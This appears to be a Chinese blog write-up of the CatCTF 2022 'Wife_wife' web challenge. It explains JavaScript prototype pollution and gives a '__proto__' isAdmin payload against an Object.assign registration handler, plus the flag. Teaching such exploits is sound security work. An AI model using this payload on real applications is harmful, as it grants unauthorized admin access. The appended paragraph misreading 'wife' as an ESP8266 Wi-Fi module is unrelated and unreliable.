WEB:Wife_wife

23 篇文章 1 订阅
18 篇文章 1 订阅

WEB:Wife_wife

image-20230322193854880

image-20230322194652956

use by payload:"__proto__"{"isAdmin":true}

image-20230322194859368

image-20230322195000835

get flag

CatCTF{test_flag_h0w_c@n_I_l1ve_w1th0ut_nilou}

参考:https://www.rstk.cn/news/25963.html?action=onClick

CATCTF wife原型链污染

CATCTF wife原型链污染

原型链污染原理:https://drun1baby.github.io/2022/12/29/JavaScript-%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/

如下代码,prototype是newClass类的一个属性。newClass 实例化的对象 newObj.__proto__ 指向 newClass 类的 prototype

function newClass() {this.test = 1;
}var newObj = new newClass();

JSON 解析的情况下,__proto__ 会被认为是一个真正的“键名”,而不代表“原型”。如果是let o2 = {a: 1, "__proto__": {b: 2}}__proto__会被认为是o2的原型。如果作为键名(不会被解析)就会作为子类的原型

let o1 = {}
let o2 = JSON.parse('{"a": 1, "__proto__": {"b": 2}}')
merge(o1, o2)
console.log(o1.a, o1.b)o3 = {}
console.log(o3.b)

merge用于合并对象

merge 操作是最常见可能控制键名的操作,也最能被原型链攻击,很多常见的库都存在这个问题。

原型链污染

CATCTF 2022 wife

靶场:https://adworld.xctf.org.cn/challenges/details?hash=e5ba95f8-884a-11ed-ab28-000c29bc20bf&task_category_id=3

注册部分的代码:

app.post('/register', (req, res) => {let user = JSON.parse(req.body)if (!user.username || !user.password) {return res.json({ msg: 'empty username or password', err: true })}if (users.filter(u => u.username == user.username).length) {return res.json({ msg: 'username already exists', err: true })}if (user.isAdmin && user.inviteCode != INVITE_CODE) {user.isAdmin = falsereturn res.json({ msg: 'invalid invite code', err: true })}let newUser = Object.assign({}, baseUser, user)users.push(newUser)res.json({ msg: 'user created successfully', err: false })
})

json解析后,利用Object.assign()创建子类newUser,push进users

这里传入payload:"__proto__"{"isAdmin":true}造成原型链污染,生成的user用户拥有isAdmin=true
在这里插入图片描述

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
wife 模块是一个基于 ESP8266 的无线模块,适用于初学者。下面我将简单介绍一下如何使用这个模块。 首先,你需要了解 ESP8266 是一个具有Wi-Fi 功能的芯片,可以用于制作无线网络设备。wife 模块则是基于此芯片设计的一个模块,用于提供更便捷的无线网络连接。 在使用 wife 模块之前,你需要先准备一些必要的硬件和软件。硬件方面,你需要一块带有 ESP8266 的开发板,如 NodeMCU 或 WeMos D1 mini。软件方面,你需要安装 Arduino IDE 和相应的 ESP8266 开发环境。 接下来,你可以尝试编写一个简单的程序,通过 wife 模块连接到 Wi-Fi 网络。在 Arduino IDE 中,选择正确的开发板和端口,并打开示例程序 "WiFiClient"。然后,你可以按照示例程序的指引,填入你的 Wi-Fi SSID 和密码,然后将代码上传到开发板上。 代码上传成功后,开发板将会连接到你的 Wi-Fi 网络,并通过串口输出连接状态。你也可以在代码中添加一些其他的功能,比如使用 wife 模块连接到互联网,发送数据等。 需要注意的是,wife 模块的使用还有很多其他的功能和应用,比如 TCP/IP 通信、远程控制等,你可以在学习的过程中深入了解和尝试这些功能。 总的来说,wife 模块使用 ESP8266 初学者可以通过简单的代码和操作,实现 Wi-Fi 连接以及一些基本的互联网功能。通过不断学习和实践,你可以逐渐掌握这个模块的更多功能,并应用到自己的项目中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值